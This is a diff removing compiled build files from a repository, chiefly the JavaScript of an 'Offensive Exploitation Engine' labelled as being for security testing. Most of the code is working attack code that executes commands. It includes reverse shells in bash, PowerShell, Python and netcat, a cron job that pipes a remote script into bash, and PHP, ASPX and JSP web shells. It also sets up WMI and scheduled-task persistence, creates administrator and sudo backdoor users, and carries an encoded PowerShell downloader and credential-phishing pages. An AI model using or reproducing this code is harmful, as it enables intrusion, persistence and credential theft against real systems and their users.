- {"version":3,"file":"comprehensive-security-research.js","sourceRoot":"","sources":["../../src/security/comprehensive-security-research.ts"],"names":[],"mappings":"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"}
@@ -1,54 +0,0 @@
1
- /**
2
- * Offensive Exploitation Engine
3
- *
4
- * Advanced exploitation capabilities for security testing.
5
- */
6
- export interface ExploitResult {
7
- success: boolean;
8
- output: string;
9
- evidence: string;
10
- technique: string;
11
- }
12
- export interface Payload {
13
- type: string;
14
- content: string;
15
- platform: string;
16
- }
17
- /**
18
- * Offensive Exploitation Engine
19
- */
20
- export declare class OffensiveExploitationEngine {
21
- /**
22
- * Generate reverse shell payloads
23
- */
24
- generateReverseShell(target: string, port: number): Payload[];
25
- /**
26
- * Create fileless persistence
27
- */
28
- createFilelessPersistence(): Promise<ExploitResult>;
29
- /**
30
- * Deploy web shell
31
- */
32
- deployWebShell(targetPath: string, password?: string): Promise<ExploitResult>;
33
- /**
34
- * Create persistence via scheduled tasks
35
- */
36
- createScheduledPersistence(): Promise<ExploitResult>;
37
- /**
38
- * Generate obfuscated payloads
39
- */
40
- generateObfuscatedPayloads(): Payload[];
41
- /**
42
- * Create DNS tunneling setup
43
- */
44
- setupDnsTunneling(domain: string): Promise<ExploitResult>;
45
- /**
46
- * Generate phishing templates
47
- */
48
- generatePhishingTemplates(): Payload[];
49
- /**
50
- * Create backdoor user account
51
- */
52
- createBackdoorUser(username: string, password: string): Promise<ExploitResult>;
53
- }
54
- //# sourceMappingURL=exploitationEngine.d.ts.map
@@ -1 +0,0 @@
1
- {"version":3,"file":"exploitationEngine.d.ts","sourceRoot":"","sources":["../../../src/security/offensive/exploitationEngine.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAMH,MAAM,WAAW,aAAa;IAC5B,OAAO,EAAE,OAAO,CAAC;IACjB,MAAM,EAAE,MAAM,CAAC;IACf,QAAQ,EAAE,MAAM,CAAC;IACjB,SAAS,EAAE,MAAM,CAAC;CACnB;AAED,MAAM,WAAW,OAAO;IACtB,IAAI,EAAE,MAAM,CAAC;IACb,OAAO,EAAE,MAAM,CAAC;IAChB,QAAQ,EAAE,MAAM,CAAC;CAClB;AAED;;GAEG;AACH,qBAAa,2BAA2B;IAEtC;;OAEG;IACH,oBAAoB,CAAC,MAAM,EAAE,MAAM,EAAE,IAAI,EAAE,MAAM,GAAG,OAAO,EAAE;IAkC7D;;OAEG;IACG,yBAAyB,IAAI,OAAO,CAAC,aAAa,CAAC;IAsCzD;;OAEG;IACG,cAAc,CAAC,UAAU,EAAE,MAAM,EAAE,QAAQ,GAAE,MAAkB,GAAG,OAAO,CAAC,aAAa,CAAC;IAgC9F;;OAEG;IACG,0BAA0B,IAAI,OAAO,CAAC,aAAa,CAAC;IAqC1D;;OAEG;IACH,0BAA0B,IAAI,OAAO,EAAE;IA8BvC;;OAEG;IACG,iBAAiB,CAAC,MAAM,EAAE,MAAM,GAAG,OAAO,CAAC,aAAa,CAAC;IAsB/D;;OAEG;IACH,yBAAyB,IAAI,OAAO,EAAE;IAsBtC;;OAEG;IACG,kBAAkB,CAAC,QAAQ,EAAE,MAAM,EAAE,QAAQ,EAAE,MAAM,GAAG,OAAO,CAAC,aAAa,CAAC;CAoCrF"}
@@ -1,263 +0,0 @@
1
- /**
2
- * Offensive Exploitation Engine
3
- *
4
- * Advanced exploitation capabilities for security testing.
5
- */
6
- import { execSync } from 'child_process';
7
- import { writeFileSync } from 'fs';
8
- import { platform } from 'os';
9
- /**
10
- * Offensive Exploitation Engine
11
- */
12
- export class OffensiveExploitationEngine {
13
- /**
14
- * Generate reverse shell payloads
15
- */
16
- generateReverseShell(target, port) {
17
- const payloads = [];
18
- // Bash reverse shell
19
- payloads.push({
20
- type: 'bash-reverse-shell',
21
- platform: 'linux',
22
- content: `bash -i >& /dev/tcp/${target}/${port} 0>&1`
23
- });
24
- // PowerShell reverse shell
25
- payloads.push({
26
- type: 'powershell-reverse-shell',
27
- platform: 'windows',
28
- content: `$client = New-Object System.Net.Sockets.TCPClient('${target}',${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()`
29
- });
30
- // Python reverse shell
31
- payloads.push({
32
- type: 'python-reverse-shell',
33
- platform: 'cross-platform',
34
- content: `import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${target}',${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);`
35
- });
36
- // Netcat reverse shell
37
- payloads.push({
38
- type: 'netcat-reverse-shell',
39
- platform: 'linux',
40
- content: `nc -e /bin/sh ${target} ${port}`
41
- });
42
- return payloads;
43
- }
44
- /**
45
- * Create fileless persistence
46
- */
47
- async createFilelessPersistence() {
48
- try {
49
- const currentPlatform = platform();
50
- if (currentPlatform === 'win32') {
51
- // Windows WMI event subscription
52
- const wmiScript = `$FilterArgs = @{Name='TestFilter'; EventNameSpace='root\\cimv2'; QueryLanguage='WQL'; Query='SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name=\"explorer.exe\"'}; $Filter=Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $FilterArgs; $ConsumerArgs = @{Name='TestConsumer'; CommandLineTemplate='cmd.exe /c echo persistence > C:\\temp\\test.txt'}; $Consumer=Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs; $BindingArgs = @{Filter=$Filter; Consumer=$Consumer}; $Binding=Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $BindingArgs`;
53
- execSync(`powershell -Command "${wmiScript}"`, { stdio: 'pipe' });
54
- return {
55
- success: true,
56
- output: 'WMI event subscription created for fileless persistence',
57
- evidence: 'WMI event filter and consumer created',
58
- technique: 'wmi-event-subscription'
59
- };
60
- }
61
- else {
62
- // Linux memory execution via cron
63
- const cronEntry = `* * * * * curl -s http://example.com/malicious.sh | bash -s`;
64
- execSync(`(crontab -l 2>/dev/null; echo "${cronEntry}") | crontab -`, { stdio: 'pipe' });
65
- return {
66
- success: true,
67
- output: 'Fileless persistence via cron created',
68
- evidence: 'Cron job added for memory execution',
69
- technique: 'cron-memory-execution'
70
- };
71
- }
72
- }
73
- catch (error) {
74
- return {
75
- success: false,
76
- output: `Fileless persistence failed: ${error}`,
77
- evidence: '',
78
- technique: 'fileless-persistence'
79
- };
80
- }
81
- }
82
- /**
83
- * Deploy web shell
84
- */
85
- async deployWebShell(targetPath, password = 'pass123') {
86
- try {
87
- // PHP web shell
88
- const phpWebShell = `<?php if(isset($_POST['${password}'])){system($_POST['${password}']);}?>`;
89
- // ASP web shell
90
- const aspWebShell = `<%@ Page Language="C#" %><%@ Import Namespace="System.Diagnostics" %><script runat="server">void Page_Load(object sender, EventArgs e){if(Request.Form["${password}"] != null){Process.Start("cmd.exe", "/c " + Request.Form["${password}"]);}}</script>`;
91
- // JSP web shell
92
- const jspWebShell = `<%@ page import="java.util.*,java.io.*"%><% if (request.getParameter("${password}") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("${password}")); } %>`;
93
- // Write web shell
94
- writeFileSync(`${targetPath}/shell.php`, phpWebShell);
95
- writeFileSync(`${targetPath}/shell.aspx`, aspWebShell);
96
- writeFileSync(`${targetPath}/shell.jsp`, jspWebShell);
97
- return {
98
- success: true,
99
- output: 'Multiple web shells deployed',
100
- evidence: `Web shells created at ${targetPath}`,
101
- technique: 'web-shell-deployment'
102
- };
103
- }
104
- catch (error) {
105
- return {
106
- success: false,
107
- output: `Web shell deployment failed: ${error}`,
108
- evidence: '',
109
- technique: 'web-shell-deployment'
110
- };
111
- }
112
- }
113
- /**
114
- * Create persistence via scheduled tasks
115
- */
116
- async createScheduledPersistence() {
117
- try {
118
- const currentPlatform = platform();
119
- if (currentPlatform === 'win32') {
120
- // Windows scheduled task
121
- const taskCommand = `schtasks /create /tn "SystemUpdate" /tr "cmd.exe /c echo persistence > C:\\temp\\persistence.txt" /sc minute /mo 1`;
122
- execSync(taskCommand, { stdio: 'pipe' });
123
- return {
124
- success: true,
125
- output: 'Scheduled task created for persistence',
126
- evidence: 'SystemUpdate task created',
127
- technique: 'scheduled-task-persistence'
128
- };
129
- }
130
- else {
131
- // Linux at job
132
- const atCommand = `echo 'echo "persistence" > /tmp/persistence.txt' | at now + 1 minute`;
133
- execSync(atCommand, { stdio: 'pipe' });
134
- return {
135
- success: true,
136
- output: 'At job created for persistence',
137
- evidence: 'At job scheduled',
138
- technique: 'at-job-persistence'
139
- };
140
- }
141
- }
142
- catch (error) {
143
- return {
144
- success: false,
145
- output: `Scheduled persistence failed: ${error}`,
146
- evidence: '',
147
- technique: 'scheduled-persistence'
148
- };
149
- }
150
- }
151
- /**
152
- * Generate obfuscated payloads
153
- */
154
- generateObfuscatedPayloads() {
155
- const payloads = [];
156
- // Base64 encoded PowerShell
157
- const base64PowerShell = 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=';
158
- payloads.push({
159
- type: 'base64-powershell',
160
- platform: 'windows',
161
- content: `powershell -EncodedCommand ${base64PowerShell}`
162
- });
163
- // XOR encoded shellcode
164
- const xorShellcode = '\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a';
165
- payloads.push({
166
- type: 'xor-shellcode',
167
- platform: 'linux',
168
- content: `echo -ne '${xorShellcode}' > /tmp/shellcode.bin`
169
- });
170
- // JavaScript obfuscation
171
- const obfuscatedJS = `eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41))`;
172
- payloads.push({
173
- type: 'obfuscated-js',
174
- platform: 'cross-platform',
175
- content: obfuscatedJS
176
- });
177
- return payloads;
178
- }
179
- /**
180
- * Create DNS tunneling setup
181
- */
182
- async setupDnsTunneling(domain) {
183
- try {
184
- // Create DNS tunneling configuration
185
- const dnsConfig = `server=8.8.8.8\naddress=/${domain}/127.0.0.1`;
186
- writeFileSync('/tmp/dnsmasq.conf', dnsConfig);
187
- return {
188
- success: true,
189
- output: 'DNS tunneling configuration created',
190
- evidence: `DNS config for domain ${domain}`,
191
- technique: 'dns-tunneling'
192
- };
193
- }
194
- catch (error) {
195
- return {
196
- success: false,
197
- output: `DNS tunneling setup failed: ${error}`,
198
- evidence: '',
199
- technique: 'dns-tunneling'
200
- };
201
- }
202
- }
203
- /**
204
- * Generate phishing templates
205
- */
206
- generatePhishingTemplates() {
207
- const templates = [];
208
- // Office 365 phishing
209
- const office365Template = `<!DOCTYPE html><html><body><form action="http://malicious.com/collect" method="post"><input type="email" name="username" placeholder="Email"><input type="password" name="password" placeholder="Password"><button>Sign In</button></form></body></html>`;
210
- templates.push({
211
- type: 'office365-phishing',
212
- platform: 'web',
213
- content: office365Template
214
- });
215
- // Gmail phishing
216
- const gmailTemplate = `<!DOCTYPE html><html><body style="font-family: Arial;"><div style="max-width: 400px; margin: 50px auto; padding: 20px; border: 1px solid #ddd;"><img src="https://www.gstatic.com/images/branding/product/1x/gsa_512dp.png" width="50" style="display: block; margin: 0 auto;"><h2 style="text-align: center;">Sign in</h2><form action="http://malicious.com/gmail" method="post"><input type="email" name="email" placeholder="Email or phone" style="width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd;"><input type="password" name="password" placeholder="Enter your password" style="width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd;"><button style="width: 100%; padding: 10px; background: #1a73e8; color: white; border: none;">Next</button></form></div></body></html>`;
217
- templates.push({
218
- type: 'gmail-phishing',
219
- platform: 'web',
220
- content: gmailTemplate
221
- });
222
- return templates;
223
- }
224
- /**
225
- * Create backdoor user account
226
- */
227
- async createBackdoorUser(username, password) {
228
- try {
229
- const currentPlatform = platform();
230
- if (currentPlatform === 'win32') {
231
- // Windows user creation
232
- const userCommand = `net user ${username} ${password} /add && net localgroup administrators ${username} /add`;
233
- execSync(userCommand, { stdio: 'pipe' });
234
- return {
235
- success: true,
236
- output: `Backdoor user ${username} created with admin privileges`,
237
- evidence: `User account ${username} added to administrators`,
238
- technique: 'backdoor-user-creation'
239
- };
240
- }
241
- else {
242
- // Linux user creation
243
- const userCommand = `useradd -m -s /bin/bash ${username} && echo '${username}:${password}' | chpasswd && usermod -aG sudo ${username}`;
244
- execSync(userCommand, { stdio: 'pipe' });
245
- return {
246
- success: true,
247
- output: `Backdoor user ${username} created with sudo privileges`,
248
- evidence: `User ${username} added to sudo group`,
249
- technique: 'backdoor-user-creation'
250
- };
251
- }
252
- }
253
- catch (error) {
254
- return {
255
- success: false,
256
- output: `Backdoor user creation failed: ${error}`,
257
- evidence: '',
258
- technique: 'backdoor-user-creation'
259
- };
260
- }
261
- }
262
- }
263
- //# sourceMappingURL=exploitationEngine.js.map
@@ -1 +0,0 @@
1
- {"version":3,"file":"exploitationEngine.js","sourceRoot":"","sources":["../../../src/security/offensive/exploitationEngine.ts"],"names":[],"mappings":"AAAA;;;;GAIG;AAEH,OAAO,EAAE,QAAQ,EAAS,MAAM,eAAe,CAAC;AAChD,OAAO,EAAc,aAAa,EAAgB,MAAM,IAAI,CAAC;AAC7D,OAAO,EAAW,QAAQ,EAAE,MAAM,IAAI,CAAC;AAevC;;GAEG;AACH,MAAM,OAAO,2BAA2B;IAEtC;;OAEG;IACH,oBAAoB,CAAC,MAAc,EAAE,IAAY;QAC/C,MAAM,QAAQ,GAAc,EAAE,CAAC;QAE/B,qBAAqB;QACrB,QAAQ,CAAC,IAAI,CAAC;YACZ,IAAI,EAAE,oBAAoB;YAC1B,QAAQ,EAAE,OAAO;YACjB,OAAO,EAAE,uBAAuB,MAAM,IAAI,IAAI,OAAO;SACtD,CAAC,CAAC;QAEH,2BAA2B;QAC3B,QAAQ,CAAC,IAAI,CAAC;YACZ,IAAI,EAAE,0BAA0B;YAChC,QAAQ,EAAE,SAAS;YACnB,OAAO,EAAE,sDAAsD,MAAM,KAAK,IAAI,kbAAkb;SACjgB,CAAC,CAAC;QAEH,uBAAuB;QACvB,QAAQ,CAAC,IAAI,CAAC;YACZ,IAAI,EAAE,sBAAsB;YAC5B,QAAQ,EAAE,gBAAgB;YAC1B,OAAO,EAAE,8FAA8F,MAAM,KAAK,IAAI,+GAA+G;SACtO,CAAC,CAAC;QAEH,uBAAuB;QACvB,QAAQ,CAAC,IAAI,CAAC;YACZ,IAAI,EAAE,sBAAsB;YAC5B,QAAQ,EAAE,OAAO;YACjB,OAAO,EAAE,iBAAiB,MAAM,IAAI,IAAI,EAAE;SAC3C,CAAC,CAAC;QAEH,OAAO,QAAQ,CAAC;IAClB,CAAC;IAED;;OAEG;IACH,KAAK,CAAC,yBAAyB;QAC7B,IAAI,CAAC;YACH,MAAM,eAAe,GAAG,QAAQ,EAAE,CAAC;YAEnC,IAAI,eAAe,KAAK,OAAO,EAAE,CAAC;gBAChC,iCAAiC;gBACjC,MAAM,SAAS,GAAG,6sBAA6sB,CAAC;gBAEhuB,QAAQ,CAAC,wBAAwB,SAAS,GAAG,EAAE,EAAE,KAAK,EAAE,MAAM,EAAE,CAAC,CAAC;gBAElE,OAAO;oBACL,OAAO,EAAE,IAAI;oBACb,MAAM,EAAE,yDAAyD;oBACjE,QAAQ,EAAE,uCAAuC;oBACjD,SAAS,EAAE,wBAAwB;iBACpC,CAAC;YACJ,CAAC;iBAAM,CAAC;gBACN,kCAAkC;gBAClC,MAAM,SAAS,GAAG,6DAA6D,CAAC;gBAChF,QAAQ,CAAC